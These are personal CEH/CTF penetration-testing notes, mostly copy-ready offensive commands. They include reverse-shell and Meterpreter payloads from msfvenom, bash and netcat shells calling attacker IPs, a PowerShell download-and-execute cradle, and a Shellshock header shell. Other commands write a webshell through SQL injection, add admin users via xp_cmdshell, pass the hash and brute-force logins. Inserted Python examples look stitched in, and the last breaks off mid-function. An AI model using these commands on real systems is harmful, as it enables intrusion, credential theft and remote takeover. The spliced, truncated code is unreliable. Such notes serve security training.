CEH Practical – LPT (Master) – CTF
Notes
I have gathered these notes from the internet and courses that I have attended.
Special thanks to:
JENS GILGES
https://www.linkedin.com/in/jens-gilges-1aa719151/
I used this site as a notepad to remember things, not to get you an answer. So if you don't like it, don't read it.
It has no structure and no index, just my notes from videos, other sites and manuals.
And I don't go through spell checks before posting.
Thanks for the knowledge:
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Recon/Information Gathering
Passive
Social media, company website, publicly available resources, job openings. Netcraft, Archive.org, Shodan, Metagoofil, Maltego, recon-ng, Pipl, Thearchive.org, Sublist3r
Active
Interacting with the victim. Becoming a Facebook friend, for example.
Google Search
site:"invid.se" filetype:pdf
intitle:"VNC viewer for Java"
inurl:"/control/userimage.html"
inurl:.php? intext:CHARACTER_SETS,COLLATIONS intitle:phpmyadmin
Extract the IP from the host command
host www.cisco.com | grep "has address" | cut -d" " -f4
Extract domains from index.html
wget invid.se
cat index.html | grep "href" | cut -d"/" -f3 | grep "site\.se" | cut -d'"' -f1 | sort -u > site.txt
www data extractor
Windows
Web Data Extractor
Linux
httrack (linux)
Enumeration / Scanning
Banner grabbing
whatweb host.se
Netdiscover
Passive Mode
netdiscover -i eth0 -p
Active Mode
netdiscover -ai eth0 -r 192.168.8.0/24 -f
Nmap port states explained (open, closed, filtered, ...)
open
An application is actively accepting TCP connections, UDP datagrams or SCTP associations on this port. Finding these is often the primary goal of port scanning. Security-minded people know that each open port is an avenue for attack. Attackers and pen-testers want to exploit the open ports, while administrators try to close or protect them with firewalls without thwarting legitimate users. Open ports are also interesting for non-security scans because they show services available for use on the network.
closed
A closed port is accessible (it receives and responds to Nmap probe packets), but there is no application listening on it. They can be helpful in showing that a host is up on an IP address (host discovery, or ping scanning), and as part of OS detection. Because closed ports are reachable, it may be worth scanning later in case some open up. Administrators may want to consider blocking such ports with a firewall. Then they would appear in the filtered state, discussed next.
filtered
Nmap cannot determine whether the port is open because packet filtering prevents its probes from reaching the port. The filtering could be from a dedicated firewall device, router rules, or host-based firewall software. These ports frustrate attackers because they provide so little information. Sometimes they respond with ICMP error messages such as type 3 code 13 (destination unreachable: communication administratively prohibited), but filters that simply drop probes without responding are far more common. This forces Nmap to retry several times just in case the probe was dropped due to network congestion rather than filtering. This slows down the scan dramatically.
unfiltered
The unfiltered state means that a port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, which is used to map firewall rulesets, classifies ports into this state. Scanning unfiltered ports with other scan types such as Window scan, SYN scan, or FIN scan, may help resolve whether the port is open.
open|filtered
Nmap places ports in this state when it is unable to determine whether a port is open or filtered. This occurs for scan types in which open ports give no response. The lack of response could also mean that a packet filter dropped the probe or any response it elicited. So Nmap does not know for sure whether the port is open or being filtered. The UDP, IP protocol, FIN, NULL, and Xmas scans classify ports this way.
closed|filtered
This state is used when Nmap is unable to determine whether a port is closed or filtered. It is only used for the IP ID idle scan.
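The six states above follow from a small set of rules: which scan type was used and what (if anything) came back. As an added example that is not part of the original notes, the function below writes those rules out explicitly; the scan names and response labels are this example's own shorthand, not Nmap's internal identifiers.

```python
#!/usr/bin/env python3
"""Added example, not from the original notes: the decision rules behind the
Nmap port states described above, written as a function so the difference
between closed, filtered, unfiltered and open|filtered is explicit."""

# Responses reduced to a few labels (Nmap's view after its retries).
SYN_ACK = "syn-ack"
RST = "rst"
UDP_REPLY = "udp-reply"
ICMP_PORT_UNREACH = "icmp-3-3"    # destination unreachable, port unreachable
ICMP_ADMIN_PROHIB = "icmp-3-13"   # communication administratively prohibited
NO_RESPONSE = None                 # nothing came back even after retries

# ICMP unreachable codes that mean "a filter answered", whatever the scan type.
ICMP_FILTER_CODES = {"icmp-3-0", "icmp-3-1", "icmp-3-2", "icmp-3-9",
                     "icmp-3-10", ICMP_ADMIN_PROHIB}


def port_state(scan, response):
    """Nmap state for a (scan type, response) pair.

    scan: "syn", "connect", "ack", "fin", "null", "xmas" or "udp".
    (closed|filtered is only produced by the idle scan, not modelled here.)
    """
    if scan == "udp":
        if response == UDP_REPLY:
            return "open"
        if response == ICMP_PORT_UNREACH:
            return "closed"          # only UDP treats 3/3 as a live, closed port
        if response in ICMP_FILTER_CODES:
            return "filtered"
        return "open|filtered"       # silence: open service or dropped probe
    if response in ICMP_FILTER_CODES or response == ICMP_PORT_UNREACH:
        return "filtered"            # TCP scans: any ICMP unreachable is a filter
    if scan in ("syn", "connect"):
        if response == SYN_ACK:
            return "open"
        if response == RST:
            return "closed"
        return "filtered"            # probe or answer was dropped
    if scan == "ack":
        # ACK scan only maps firewall rules: RST proves reachability, nothing more.
        return "unfiltered" if response == RST else "filtered"
    if scan in ("fin", "null", "xmas"):
        # RFC 793: closed ports answer RST, open ports stay silent. Windows and
        # some devices send RST for every port, so this only works on
        # RFC-compliant stacks (hence "Linux machines" in the option notes).
        return "closed" if response == RST else "open|filtered"
    raise ValueError("unknown scan type: %r" % scan)


def summary_table():
    """Every state reachable from each scan type, for quick reference."""
    responses = (SYN_ACK, RST, UDP_REPLY, ICMP_PORT_UNREACH,
                 ICMP_ADMIN_PROHIB, NO_RESPONSE)
    table = {}
    for scan in ("syn", "ack", "fin", "udp"):
        table[scan] = sorted({port_state(scan, r) for r in responses})
    return table


if __name__ == "__main__":
    for scan, states in summary_table().items():
        print("%-4s -> %s" % (scan, ", ".join(states)))
```

Running it prints which states each scan type can ever report, which is a quick way to remember why an ACK scan never says "open" and why a FIN scan never says "filtered" unless an ICMP error comes back.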
Nmap examples
nmap -p 80 --script=http-enum www.certifiedhacker.com
nmap -p- -Pn -sS -sV -A 10.10.10.1
nmap -p- -Pn -sU -sS -sV -A 10.10.10.1
nmap -sC -sV -oA nmap/initial 10.10.10.1
nmap -p 445 --script safe -Pn -n 10.10.10.1
nmap -p 445 --script "vuln and safe" -Pn -n 10.10.10.1
Nmap Scripts
--script=vuln all default vulnerability scripts
--script=http-enum HTTP enumeration, banner grab and so on
--script=http-shellshock Shellshock detection
--script=smb-brute SMB brute force
Search for scripts
grep -r categories /usr/share/nmap/scripts/*.nse
grep -r categories /usr/share/nmap/scripts/*.nse | grep safe
grep -r categories /usr/share/nmap/scripts/*.nse | grep -oP '".*?"' | sort -u
grep -r categories /usr/share/nmap/scripts/*.nse | grep default | awk -F: '{print $1}'
Default scripts and smb:
locate -r '\.nse$' | xargs grep categories | grep 'default\|version' | grep smb
Nmap – Options
-n disable DNS resolution
-sC default scripts
-sn ping sweep
-sT connect scan (full 3-way handshake)
-sS stealth half-open scan: SYN -> SYN/ACK -> RST
-sX Xmas scan (FIN/URG/PSH); no response means the port is open (Linux machines)
-sN Null scan, TCP packet with no flags set (and no data); no response means the port is open (Linux machines)
-sV version detection
-sU UDP scan
-p- -A all ports and aggressive
-sU -p 162 snmp agent
Nmap – Combos
-sS -sV stealth and version
-sI idle scan, zombie node (good against IDS)
-sS -O operating system
-sn -f ping sweep with fragmentation
-p 80 -A -T3 aggressive on port 80 and try harder with T3 (T0-T5: T0 slow, T5 fast)
-sS -D RND:10 decoy (10 random decoys)
Port scanning with Netcat
TCP scan
nc -nvv -w 1 -z 10.0.2.15 1-10000
UDP scan
UDP can give false positives if the host does not respond with ICMP
nc -unvv -w 1 -z 10.0.2.15 160-165
Hping3
Half-open SYN scan
hping3 -S
XMAS tree scan
hping3 -F -P -U
Null scan
hping3
FIN scan
hping3 -F
ACK scan
hping3 -A
UDP scan
hping3 -2
Ping and portscan from shell
Ping from the shell to find online hosts
for ip in $(seq 1 254); do ping -c 1 172.20.40.$ip > /dev/null && echo "Online: 172.20.40.$ip"; done
Port scan from the shell without nmap (or download a static nmap from GitHub)
for port in 22 25 80 443 445 8080 8443; do (echo Anything > /dev/tcp/172.20.40.201/$port && echo "open - $port") 2> /dev/null; done
Check whether a single port is open or closed with bash
bash -c 'echo 1> /dev/tcp/172.20.20.188/1900 && echo open || echo false'
Gobuster
./gobuster -fw -k -u https://10.10.10.1 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
Dirb
dirb http://10.10.10.1 /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
Curl
curl --url "imap://mail.example.com/" --user "bobby:tables"
Upload
curl –upload-file file.txt -v –url <url> -0 –http1.0
Cewl
Find words on web pages that can be used for password cracking.
cewl http://www.site.se -m 6 -w /cewl.txt
The list can then be passed to John the Ripper
Directory or Path Traversal
192.168.1.1/dvwa/vulnerabilities/fi/?page=../../../../../../etc/passwd
Null Byte
?page=../../../../../etc/passwd%00
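The two payloads above work because the include handler decodes the parameter and glues it onto a base directory without checking where the result ends up; the trailing %00 adds a NUL byte that older runtimes used to cut off an appended suffix such as ".php". As an added example, not from the original notes, the snippet below shows the naive resolution next to a hardened one that refuses both tricks. BASE_DIR and the handler are constructed for the demo.

```python
#!/usr/bin/env python3
"""Added example (not from the notes): how a ?page= value becomes a file path,
naively and safely. BASE_DIR and all inputs are constructed for the demo; the
payloads are the ones shown in the notes."""
import posixpath
from urllib.parse import unquote

BASE_DIR = "/var/www/dvwa/pages"   # constructed document root


def vulnerable_path(base_dir, page):
    """What the vulnerable include effectively does: decode, concatenate, let
    the OS normalise. ../ walks out of base_dir and %00 keeps a NUL byte."""
    return posixpath.normpath(base_dir + "/" + unquote(page))


def safe_path(base_dir, page):
    """Resolved path inside base_dir, or None if the request must be refused."""
    decoded = unquote(page)
    # 1. Embedded NUL: never legitimate in a file name, breaks OS calls anyway.
    if "\x00" in decoded:
        return None
    # 2. Refuse any traversal component instead of stripping it out
    #    (stripping is bypassable with inputs such as ....//).
    parts = decoded.replace("\\", "/").split("/")
    if ".." in parts:
        return None
    # 3. Normalise and prove the result still sits under base_dir.
    base = posixpath.normpath(base_dir)
    joined = posixpath.normpath(posixpath.join(base, decoded.lstrip("/")))
    if joined != base and not joined.startswith(base + "/"):
        return None
    return joined


def decide(page):
    """Verdict string for a request, handy for an access log."""
    return "allow" if safe_path(BASE_DIR, page) is not None else "deny"


if __name__ == "__main__":
    for p in ("about.html", "../../../../../../etc/passwd",
              "../../../../../etc/passwd%00"):
        print("%-32s naive=%-22s verdict=%s" % (p, vulnerable_path(BASE_DIR, p), decide(p)))
```

On a real server the last step should also pass the result through os.path.realpath before the prefix check, so a symlink inside the document root cannot point outside it; posixpath is used here only to keep the demo deterministic without touching the filesystem.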
Wpscan
wpscan -u http://10.1.1.1/ --enumerate t --enumerate u
wpscan -u http://10.1.1.1 -e --log tenten_wpscan.txt
wpscan --url <url> (scan the CMS)
wpscan --url <url> --enumerate vp (scan plugins)
wpscan --url <url> --enumerate vt (scan themes)
wpscan --url <url> --enumerate u (enumerate users)
wpscan --url <url> --wordlist pass.txt --threads 50 (brute force)
Metagoofil
metagoofil.py -d apple.com -t doc,pdf -l 200 -n 50 -o applefiles -f results.html
Nikto
nikto -h 10.1.1.1
Droopescan
./droopescan scan drupal -u http://192.168.2.152
Dns
nslookup
server 10.10.10.100
host -t ns domain.se
host -t mx domain.se
host www.domain.se
Zonetransfer
host -t axfr domain.se ns1.domain.se
host -l domain.se 10.1.1.1
zone transfers
host -l server.se ns3.server.se.
Reverse DNS
theharvester -n -d host.se -b all
Dnsenum
dnsenum domain.se
Dnsrecon
dnsrecon -d 10.10.10.100 -r 10.0.0.0/8
Smtp
vrfy
for user in $(cat users.txt); do echo VRFY $user | nc -nv -w 1 192.168.1.1 25 2>/dev/null | grep ^"250"; done
Python script to VRFY (Python 3)
#!/usr/bin/env python3
import socket
import sys

if len(sys.argv) != 2:
    print("Usage: vrfy.py <username>")
    sys.exit(0)

# connect to the SMTP server (address and port as in the original note)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 25))

# read and print the server banner
banner = s.recv(1024)
print(banner.decode(errors='replace'))

# VRFY <user>, terminated with CRLF as SMTP requires
s.send(('VRFY ' + sys.argv[1] + '\r\n').encode())
result = s.recv(1024)
print(result.decode(errors='replace'))
s.close()
Smb
Rpcclient
Old
rpcclient -U roger 192.168.1.1
srvinfo
enumdomusers
enumalsgroups domain
lookupnames administrators
querydominfo
enumdomusers
queryuser roger
Nbtscan
nbtscan -f target
nbtscan -v verbose
Smb enumeration
enum4linux -a 192.168.1.1
Smb nmap
nmap --script=vuln 192.168.1.1 -p445
Smbclient
Look for shares
smbclient -L //10.10.10.100 -U name
smbclient \\\\192.168.1.1\\Share -W DOMAIN -U roger
Smbmap
Locate Shares:
smbmap -H 10.10.10.100
List Files on Share
smbmap -R Replication -H 10.10.10.100
List Files
smbmap -R Replication -H 10.10.10.100 -A Groups.xml -q
smbmap -u username -p 'HASH:HASH' -H 192.168.1.1 -R --download path/pathtofile.txt
--download Download a file with smbmap
Smbclient
smbclient //10.10.10.100/Replication
recurse ON
prompt OFF
mget *
Smb impacket
/usr/share/doc/python-impacket/examples/GetADUsers.py -all domain.dc/svc_user -dc-ip 10.10.10.1
/usr/share/doc/python-impacket/examples/psexec.py domain.dc/svc_tgs@10.10.10.1
smbmap -d domain.dc -u svc_user -p password -H 10.10.10.1
/usr/share/doc/python-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.1 domain.dc/svc_user
/usr/share/doc/python-impacket/examples/psexec.py domain.dc/Administrator@10.10.1.1
-R List files recursively
Password from GPO Policy
less /usr/share/smbmap/10.1.1.1/Replication_domain.dc_Policies_\{31B2F340-016D-11D2-945F-00C0aFB984F9\}_MACHINE_Preferences_Groups_Groups.xml
edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJa3mjWA98ga9guKOhaOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
PASSWORDWITH_gpp-decrypt
Windows Tips
Run as command
runas /netonly /user:domain.dc\svc_user cmd
Windows Credentials Editor (WCE)
wce64.exe -w
Sharphound
SharpHound.exe -c all -d domain.dc --domaincontroller 10.10.1.1
Find files Windows
where /R C:\ bash.exe
Getting Access and Maintaining Acccess
Searchsploit
Mirror (copy) an exploit to the current directory
searchsploit -m exploits/php/webapps/18650.py
searchsploit -x exploits/php/webapps/18650.py
searchsploit -p exploits/php/webapps/18650.py
Metasploit
Start the database
service postgresql start
Start Metasploit
msfconsole -q
Background a session: ctrl z or type background
exploit -j
sessions -i
sessions -l
setg = global value ex. setg RHOST 192.168.1.1
Metaexploit Steps
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST ip
set LPORT port
exploit -j
Access the exploit
shell.aspx
shell
systeminfo
Search for suggested exploits
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
use exploit/windows/local/ms10_015_kitrap0d
set lhost ip
set lport port
Create Payloads
Msfvenom
Linux
msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.1 LPORT=4444 SHELL=/bin/bash -a cmd --platform unix -e generic/none
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f elf > shell.elf
Windows
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=8888 -f exe > /root/Desktop/1.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f macho > shell.macho
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
msfvenom -p php/meterpreter_reverse_tcp lhost=10.10.14.10 LPORT=4444 > r2.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f war > shell.war
Python
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.1 LPORT=444 -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.1 LPORT=444 -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.1 LPORT=444 -f raw > shell.pl
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f <TYPE>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f <TYPE>
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f <TYPE>
Unicorn
Create Payload
python unicorn.py windows/meterpreter/reverse_http 10.1.1.1 8001
Use exploit and create payload
Exploit:
chmod 755 cve-2017-8759_toolkit.py
Create Payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=6996 -f exe > /tmp/gotcha.exe
Create rtf file from exploit
python cve-2017-8759_toolkit.py -M gen -w Gotcha.rtf -u http://192.168.1.101/gotcha.txt
Host the payload on our server
python cve-2017-8759_toolkit.py -M exp -e http://192.168.1.101/gotcha.exe -l /tmp/gotcha.exe
Mini webserver with python
python -m SimpleHTTPServer 80
File download
PowerShell
powershell IEX(new-object net.webclient).downloadstring('http://10.1.1.10/empire.ps1')
Linux
wget 192.168.1.1:80/attack.txt
curl 192.168.1.1:80/attack.txt > file.txt
fetch http://192.168.1.1:80/attack.txt
Victim > Attacker
nc -lvp 4444 > file.txt
nc 192.168.1.1 4444 < file.txt
Attacker > Victim
Target
nc -nvlp 81 > file.txt
Attacker
nc 192.168.1.1 81 < file.txt
Netcat
Victim:
nc -lvnp 4444 > incoming.exe
Source:
nc -nv 10.0.2.15 4444 </usr/share/windows-binaries/wget.exe
Windows
Tftp
Server
atftpd -v --port 69 --bind-address 10.10.10.2 --daemon /srv/tftp/
Client
tftp -i 192.168.1.1 GET nc.exe
Ftp
On Windows you can script this with a text file
ftp -s:ftp.txt
ftp 192.168.1.1
binary
ls
get nc.exe
put nc.exe
Reverse Shell
Netcat
Use ncat to get support for SSL and access rules
nc -lvnp 4444
Connector
nc -nv 192.168.1.1 25
Netcat Command execution
Victim
nc -lvnp 4444 -e /bin/bash
Source
nc -nv 10.0.2.15 4444
Netcat Windows to get PowerShell shell
nc64.exe 10.1.1.1 9001 -e powershell
Upgrade from dash or a limited shell
Attacker:
nc -nlvp 9001
Victim:
bash -c 'bash -i >& /dev/tcp/192.168.1.1/9001 0>&1'
You then get a shell on the attacker; run
python -c 'import pty; pty.spawn("/bin/bash")'
After that
script -q /dev/null
Then background it with
ctrl z
Then type
stty raw -echo
Then hit fg to bring it to the foreground
OpenSSL
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Start the listener on the attacker
openssl s_server -quiet -key key.pem -cert cert.pem -port 4444
Start the reverse shell on the victim with openssl
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.1.1:4444 > /tmp/s; rm /tmp/s
ASPX
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f aspx -o shell.aspx
PHP
Create s.php
/*s.php*/
<?php echo shell_exec($_GET['cmd']); ?>
Copy nc.exe and s.php to web folder
http://10.10.10.1/s.php?cmd=nc 10.10.14.10 4444 -e cmd
wget 10.1.1.1:80/php-reverse-shell.txt -P /var/www/admin/
mv /var/www/admin/php-reverse-shell.txt /var/www/admin/php-reverse-shell.php
Nice remote shell
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=linux
If there is no real bash
ctrl z
background
stty raw -echo
fg
Password
Responder
Set up responder to listen to clients and capture hashes
responder
Capture NTLM hashes through SQL injection
Start an SMB server on the attacker
impacket-smbserver share $(pwd)
Use this on the web page:
; use master; exec xp_dirtree '\\10.1.1.1\share';--
Unshadow
sudo /usr/sbin/unshadow /etc/passwd /etc/shadow > ~/passwords.txt
HASHCAT
hashcat -h | grep -i ntlm
hashcat -m 3100 hashes.txt /opt/share/wordlist/rocky.txt
To launch a combination attack against MD5 password hashes
hashcat -m 0 -a 1 /root/hashes/hashes.txt /root/rockyou.txt
A straight (wordlist) attack is very fast on simple passwords
hashcat -m 0 -a 0 /root/hashes/hashes.txt /root/rockyou.txt
John The Ripper
john hashes.txt --format=nt --show (crack NTLM)
Use the cewl.txt in John the Ripper to generate a mangled list
john --wordlist=cewl.txt --rules --stdout > pass.txt
john --wordlist=/usr/share/wordlists/rockyou.txt
RSA
Now we need to convert the RSA key to John format and save it in a file:
ssh2john rsakey > rsa2johnfile
Now crack the passphrase using any wordlist:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=SSH rsa2johnfile
When it is done, you can show the password if it has been cracked by issuing the following command:
john --show rsa2johnfile
Passwords dumps Windows
Pwdump and FGdump
crunch Create Passwordlists
crunch 6 6 01234567890ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ
Passing The Hash
Passing the hash
pth-*
export SMBHASH=1231234124124124124:1243124124124124124124124
pth-winexe -U administrator% //192.168.1.1 cmd
Medusa
medusa -h 192.168.1.1 -u admin -P password.txt -M http -m DIR:/admin -T 20
Ncrack
Use for RDP brute force
ncrack -v -f --user administrator -P password.txt rdp://192.168.1.1,CL=1
Hydra
hydra -l root -P /usr/share/wordlists/rockyou.txt -u -s 22 10.1.1.1 ssh
hydra 10.1.1.1 -V -l user -P /usr/share/wordlists/rockyou.txt http-get-form "/login.php:username=^USER^&password=^PASS^&Login=Login:F=The password you entered was not valid.:H=Cookie: PHPSESSID=2tr9o96unnmlrgfom8hbaqhp7l; security=low"
hydra -l admin -P /usr/share/wordlists/rockyou.txt docker.hackthebox.eu http-post-form "/:password=^PASS^:Invalid password!" -s 54415 -I
MySQL
Connect to local database
mysql -u zabbix -D zabbixdb -p
Sqlmap
Use Burp Suite to capture the login request
Save the login request to login.req
sqlmap -r login.req --level 5
Search for databases
sqlmap -u "http://192.168.1.1/index.php?par=" --dbs
Check the privileges of the database users
sqlmap -u "http://192.168.1.124/sqli/Less-1/?id=1" --privileges
Read a file from the web server
sqlmap -u "http://192.168.1.124/sqli/Less-1/?id=1" --file-read=/xampp/htdocs/index.php --batch
Dump usernames and passwords
sqlmap -u "http://192.168.1.1/comment.php?id=123" --dbms=mysql --dump --threads=5
Dump tables
sqlmap -u "http://192.168.1.1/index.php?par=" --dbs -D dbname --tables --dump
sqlmap -u "http://192.168.1.1/index.php?par=" --dbs -D dbname -T tablename --dump
Automated shell
sqlmap -u "http://192.168.1.1/comment.php?id=123" --dbms=mysql --os-shell
sqlmap -u http://10.1.1.1/login.php --forms --level 5 --risk 3 --string "The password you entered was not valid." --dbs --batch
sqlmap -l trace.txt --dbs (RDBMS enumeration)
sqlmap -l trace.txt -D <db> --tables (list tables)
sqlmap -l trace.txt -D <db> -T <table> --dump (dump table content)
Crawl links
sqlmap -u http://192.168.1.1 --crawl=1
sqlmap -u http://192.168.1.1 --forms --batch --crawl=5 --cookie=jsessionid=1234 --level=5 --risk=3
Manual sql injection commands
Check for SQLi vulnerability
?id=1'
Find the number of columns
?id=1 order by 9 -- -
Find which column is reflected in the output
?id=1 union select 1,2,3,4,5,6,7,8,9 -- -
Get the username of the SQL user
?id=1 union select 1,2,3,4,user(),6,7,8,9 -- -
Get the version
?id=1 union select 1,2,3,4,version(),6,7,8,9 -- -
Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- -
Get all columns from a specific table
?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users' -- -
Get the content of the users table, columns name and password (0x3a is just a ':' delimiter between name and password)
?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users
Read a file
?id=1 union select 1,2,3,4,load_file('/etc/passwd'),6,7,8,9 -- -
?id=1 union select 1,2,3,4,load_file('/var/www/login.php'),6,7,8,9 -- -
Create a file and read it back to check that it was really created
?id=1 union select 1,2,3,4,'this is a test message',6,7,8,9 into outfile '/var/www/test' -- -
?id=1 union select 1,2,3,4,load_file('/var/www/test'),6,7,8,9 -- -
Create a file to get a shell
?id=1 union select null,null,null,null,'<?php system($_GET["cmd"]) ?>',6,7,8,9 into outfile '/var/www/shell.php' -- -
?id=1 union select null,null,null,null,load_file('/var/www/shell.php'),6,7,8,9 -- -
Then go to the browser and see if commands execute
http://<targetip>/shell.php?cmd=id
http://<targetip>/shell.php?cmd=id
Sql injections
| User name      | Password       | SQL Query           |
|----------------|----------------|---------------------|
| tom            | tom            | SELECT * FROM users |
| tom            | ' or '1'='1    | SELECT * FROM users |
| tom            | ' or 1='1      | SELECT * FROM users |
| tom            | 1' or 1=1 -- - | SELECT * FROM users |
| ' or '1'='1    | ' or '1'='1    | SELECT * FROM users |
| ' or ' 1=1     | ' or ' 1=1     | SELECT * FROM users |
| 1' or 1=1 -- - | blah           | SELECT * FROM users |
'or 1=1#
' or '1'='1
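The rows in the table above all rely on the login query being assembled as a string, so the quote in the input closes the literal and the rest becomes SQL. As an added example that is not part of the original notes, the script below runs those same inputs against a throwaway in-memory SQLite table twice: once with the query built by concatenation and once with bound parameters. The table name, columns and the two sample accounts are constructed for the demo (note that SQLite, unlike MySQL, does not treat `#` as a comment, so the `'or 1=1#` variant is not included).

```python
#!/usr/bin/env python3
"""Added example (not from the notes): the login-bypass inputs from the table,
run against a constructed in-memory SQLite database with a concatenated query
and then with a parameterised one."""
import sqlite3


def make_db():
    """Constructed users table: two accounts, plaintext passwords for brevity."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("tom", "tom"), ("alice", "s3cret")])
    return conn


def login_vulnerable(conn, username, password):
    """Rows matched by the string-built query, or -1 when the statement was
    malformed (what a lone ' probe such as ?id=1' provokes)."""
    sql = ("SELECT * FROM users WHERE name = '%s' AND password = '%s'"
           % (username, password))
    try:
        return len(conn.execute(sql).fetchall())
    except sqlite3.Error:
        return -1


def login_safe(conn, username, password):
    """Same query with bound parameters: the input is data, never SQL text."""
    sql = "SELECT * FROM users WHERE name = ? AND password = ?"
    return len(conn.execute(sql, (username, password)).fetchall())


def compare(username, password):
    """(rows from the vulnerable query, rows from the safe query) for one input pair."""
    conn = make_db()
    try:
        return (login_vulnerable(conn, username, password),
                login_safe(conn, username, password))
    finally:
        conn.close()


if __name__ == "__main__":
    inputs = [("tom", "tom"), ("tom", "' or '1'='1"), ("tom", "1' or 1=1 -- -"),
              ("' or '1'='1", "' or '1'='1"), ("1' or 1=1 -- -", "blah"), ("tom", "'")]
    for user, pw in inputs:
        print("%-16r %-18r vulnerable=%2d safe=%d" % ((user, pw) + compare(user, pw)))
```

With the concatenated query every bypass row matches both accounts (2 rows) and the lone quote produces a syntax error, which is exactly the signal the `?id=1'` probe looks for; with bound parameters only the real credentials match.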
Command injections
;ls
sqsh – Interactive database shell for Sybase
Login
sqsh -S 127.0.0.1:123 -U sa -P secretpassword
exec xp_cmdshell 'whoami'
go
exec xp_cmdshell 'net user roger pass /add'
go
exec xp_cmdshell 'net localgroup Administrators roger /add'
go
exec xp_cmdshell 'net localgroup "Remote Desktop Users" roger /add'
go
Shellshock with Burpsuite
User-Agent: () { :; }; bash -i >& /dev/tcp/10.10.14.1/8081 0>&1
Snmp
snmpwalk 10.1.1.1 -c public -v 2c
onesixtyone
HEX to TXT and Back
xxd -ps fil.txt > fil.txt.hex
vi fil.txt.hex
xxd -r -ps fil.txt.hex > fil.txt
Stego and Strings
steghide --extract -sf ./Granted.jpg
binwalk -e
java -jar Stegsolve.jar
strings ./HackerAccessGranted.jpg
Stego Links
https://www.dcode.fr/caesar-cipher
https://www.splitbrain.org/_static/ook/
https://incoherency.co.uk/image-steganography/#unhide
Magic Numbers
Hex to bin
xxd -r hashdump.txt hex.bz2
Links
https://en.wikipedia.org/wiki/List_of_file_signatures
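The file-signature list above is what tools like binwalk and file consult: the first few bytes identify the real format regardless of what the extension claims. As an added example that is not from the original notes, the script below carries a short signature table (well-known values), a plain-hex reverse like `xxd -r -ps`, and a check that flags uploads whose content and extension disagree. All sample blobs are constructed.

```python
#!/usr/bin/env python3
"""Added example (not from the notes): identify a file by its magic number and
compare it with what the extension claims. Signature values are the well-known
ones from the file-signature list; every sample blob is constructed."""

# (leading bytes, type name)
SIGNATURES = [
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"%PDF-", "pdf"),
    (b"PK\x03\x04", "zip"),
    (b"BZh", "bzip2"),
    (b"\x1f\x8b", "gzip"),
    (b"\x7fELF", "elf"),
    (b"MZ", "pe"),
]

# What content each extension is expected to carry.
EXTENSION_TYPE = {
    "png": "png", "jpg": "jpeg", "jpeg": "jpeg", "gif": "gif", "pdf": "pdf",
    "zip": "zip", "docx": "zip", "jar": "zip", "bz2": "bzip2", "gz": "gzip",
    "exe": "pe", "dll": "pe",
}


def identify(data):
    """Type name from the leading bytes, or 'unknown' if no signature matches."""
    for magic, name in SIGNATURES:
        if data.startswith(magic):
            return name
    return "unknown"


def hex_to_bytes(text):
    """Equivalent of `xxd -r -ps`: a plain hex dump back to bytes, whitespace ignored."""
    return bytes.fromhex("".join(text.split()))


def check_upload(filename, data):
    """(detected type, verdict): 'ok' when content and extension agree,
    'mismatch' when they disagree, 'unchecked' when the extension is unknown."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    detected = identify(data)
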